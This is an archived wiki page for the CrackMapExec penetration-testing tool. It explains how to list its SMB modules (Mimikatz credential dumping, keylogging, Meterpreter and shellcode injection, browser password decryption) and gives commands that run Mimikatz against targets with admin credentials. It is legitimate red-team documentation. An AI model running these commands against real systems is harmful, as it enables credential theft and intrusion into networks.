This repository has been archived by the owner on Dec 6, 2023. It is now read-only.
Using Modules
byt3bl33d3r edited this page Apr 26, 2017 · 4 revisions
As of v3.1, the way modules are loaded and used has changed in an effort to make CME more portable and to enable it to be packaged.
With v4.0, each protocol can now have its own set of modules (fun fun fun!)
Run cme <protocol> -L to view available modules for the specified protocol.
For example, to view all modules for the SMB protocol:
#~ cme smb -L
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] get_keystrokes Logs keys pressed, time and the active window
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] mimikatz_enum_chrome Decrypts saved Chrome passwords using Mimikatz
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] get_netrdpsession Enumerates all active RDP sessions
[*] uac Checks UAC status
[*] netripper Capture's credentials by using API hooking
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] multirdp Patches terminal services in memory to allow multiple RDP users
[*] pe_inject Downloads the specified DLL/EXE and injects it into memory
[*] test_connection Pings a host
[*] shellcode_inject Downloads the specified raw shellcode and injects it into memory
[*] tokens Enumerates available tokens
[*] mimikatz Dumps all logon credentials from memory
[*] mimikittenz Executes Mimikittenz
[*] enum_chrome Decrypts saved Chrome passwords using Get-ChromeDump
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] invoke_vnc Injects a VNC client in memory
[*] mimikatz_enum_vault_creds Decrypts saved credentials in Windows Vault/Credential Manager
[*] get_netdomaincontroller Enumerates all domain controllers
[*] get_timedscreenshot Takes screenshots at a regular interval
Run cme <protocol> <target(s)> -M <module name> to run a module.
For example, to run the SMB Mimikatz module:
#~ crackmapexec smb <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz
Run cme <protocol> -M <module name> --options to view a module's supported options, e.g.:
#~ cme smb -M mimikatz --options
Module options are specified with the -o flag. All options are specified in the form of KEY=value (msfvenom style).
Example:
#~ cme <protocol> <target(s)> -u Administrator -p 'P@ssw0rd' -M mimikatz -o COMMAND='privilege::debug'